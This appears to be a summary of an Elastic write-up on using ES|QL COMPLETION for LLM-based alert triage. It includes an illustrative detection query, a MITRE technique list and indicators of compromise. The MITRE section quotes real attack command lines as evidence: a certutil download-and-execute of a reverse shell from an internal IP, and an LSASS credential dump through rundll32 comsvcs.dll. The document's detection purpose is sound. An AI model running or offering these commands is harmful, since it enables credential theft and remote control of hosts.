Elastic’s ES|QL COMPLETION embeds LLM inference directly into ES|QL queries so detection rules can reason about contextual behavior inline, reducing the need for extensive exception lists and external orchestration. #ESQL_COMPLETION #SCCM
Keypoints
- ES|QL COMPLETION allows LLM reasoning to run inside query execution, enabling detection logic to evaluate context and produce structured verdicts without external orchestration.
- The pattern aggregates related alerts (by host or user), builds a structured context string, calls COMPLETION for judgment, parses the response, and filters on verdict/confidence before alerting.
- Prebuilt rules (LLM-Based Attack Chain Triage by Host and LLM-Based Compromised User Triage by User) demonstrate triage for host- and user-centric scenarios and are available in the detection-rules repository.
- Real examples show the LLM distinguishing benign enterprise activity (SCCM, Citrix, Nessus scans) from true attacks (certutil download-and-execute, LSASS memory dumps) using command lines, parent processes, and file paths.
- COMPLETION supports both Elastic Cloud models and connectors to Azure OpenAI, Amazon Bedrock, OpenAI, and Google Vertex, with configuration via the LLM connector documentation.
- Built-in safeguards include a 100-row per execution limit and guidelines to use LIMIT and thresholds to control cost and scale when sending contexts to the LLM.
- Testing via ROW with known examples is recommended to iterate prompts and validate structured outputs before deploying to production.
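An added example of the pattern described above (aggregate related alerts by host, build a context string, call COMPLETION, parse the verdict, filter on verdict and confidence). It is illustrative, not Elastic's prebuilt "LLM-Based Attack Chain Triage by Host" rule: the alerts index name, the field names, the inference endpoint id `my-llm-endpoint`, the alert and confidence thresholds and the exact `COMPLETION ... WITH { ... }` syntax (which differs between stack versions) are all assumptions. The first query is the ROW-based dry run for iterating on the prompt; the second is the shape a detection rule would use.

```esql
// Dry run: feed one known-benign SCCM example through the prompt with ROW
// (constructed sample context; no alerts index required).
ROW context = "Host: ws-01\nParent process: C:\\Windows\\CCM\\CcmExec.exe\nCommand lines: \"PowerShell.exe\" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass \"& 'C:\\WINDOWS\\CCM\\SystemTemp\\0b109ff.ps1'\""
| EVAL prompt = CONCAT(
    "You are a SOC analyst. Decide whether the activity below is MALICIOUS or BENIGN enterprise tooling. ",
    "Answer on one line exactly as VERDICT|CONFIDENCE|REASON, where CONFIDENCE is 0-100.\n",
    context)
| COMPLETION triage = prompt WITH { "inference_id": "my-llm-endpoint" }   // endpoint id is an assumption
| DISSECT triage "%{verdict}|%{confidence}|%{reason}"
| KEEP verdict, confidence, reason

// Rule-shaped query: aggregate recent alerts per host, cap the row count before
// the LLM call (COMPLETION is limited to 100 rows per execution), then filter.
FROM .alerts-security.alerts-default
| WHERE @timestamp > NOW() - 1 hour AND host.name IS NOT NULL
| STATS
    alert_count   = COUNT(*),
    rule_names    = VALUES(kibana.alert.rule.name),
    parents       = VALUES(process.parent.executable),
    command_lines = VALUES(process.command_line)
  BY host.name
| WHERE alert_count >= 3                 // only hosts with a cluster of alerts (assumed threshold)
| SORT alert_count DESC
| LIMIT 50                               // stay under the 100-row COMPLETION limit and bound cost
| EVAL context = CONCAT(
    "Host: ", host.name,
    "\nRules: ", MV_CONCAT(rule_names, "; "),
    "\nParent processes: ", MV_CONCAT(parents, "; "),
    "\nCommand lines: ", MV_CONCAT(command_lines, " | "))
| EVAL prompt = CONCAT(
    "You are a SOC analyst. Decide whether the activity below is MALICIOUS or BENIGN enterprise tooling. ",
    "Answer on one line exactly as VERDICT|CONFIDENCE|REASON, where CONFIDENCE is 0-100.\n",
    context)
| COMPLETION triage = prompt WITH { "inference_id": "my-llm-endpoint" }
| DISSECT triage "%{verdict}|%{confidence}|%{reason}"
| EVAL confidence = TO_INTEGER(confidence)
| WHERE verdict == "MALICIOUS" AND confidence >= 80   // assumed alerting threshold
| KEEP host.name, alert_count, verdict, confidence, reason, context
```

The DISSECT step is the check worth keeping: a model that drifts from the requested `VERDICT|CONFIDENCE|REASON` shape yields null fields, so the final WHERE silently drops malformed responses instead of alerting on them, and the ROW dry run is where that format should be pinned down before the rule goes live.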
MITRE Techniques
- [T1059.001] PowerShell – Execution of PowerShell for scripting and payload delivery as seen in command lines ("PowerShell.exe" -NoLogo -Noninteractive -NoProfile -ExecutionPolicy Bypass "& 'C:\WINDOWS\CCM\SystemTemp\0b109ff.ps1'").
- [T1046] Network Service Discovery – Use of ARP and network enumeration for discovery as shown ('arp -a').
- [T1105] Ingress Tool Transfer – Downloading payloads from network locations using utilities (download-and-execute pattern) as in ('certutil.exe -f -urlcache -split http://10.100.100.10:9090/revershell.exe c:\windows\temp\revershell.exe').
- [T1003.001] LSASS Memory – Credential dumping via LSASS memory techniques and comsvcs.dll mini-dump behavior ('rundll32.exe C:\windows\System32\comsvcs.dll, #+000024 596 \Windows\Temp\ksR443WnM.vhdx full').
- [T1218.011] Signed Binary Proxy Execution (rundll32) – Abuse of rundll32 to execute malicious payloads or DLL routines as evidenced by ('rundll32.exe C:\windows\System32\comsvcs.dll, #+000024 …').
- [T1059] Command and Scripting Interpreter – Use of command interpreters and scripted commands (cmd.exe, PowerShell) to run tools and orchestrate actions ('cmd.exe /c c:\windows\temp\revershell.exe').
Indicators of Compromise
- [IP Address] download/C2 and scanner endpoints – 10.100.100.10, 192.168.1.100
- [File names/paths] observed payloads and scanner artifacts – c:\windows\temp\revershell.exe, C:\Windows\TEMP\nessus_enumerate_ms_azure_vm.txt
- [Process/Executable names] parent/launcher processes and tools seen in alerts – CcmExec.exe, certutil.exe
- [DLL/Library paths] libraries used in credential access and load-time execution – C:\windows\System32\comsvcs.dll, C:\Windows\CCM\SystemTemp\0b109ff.ps1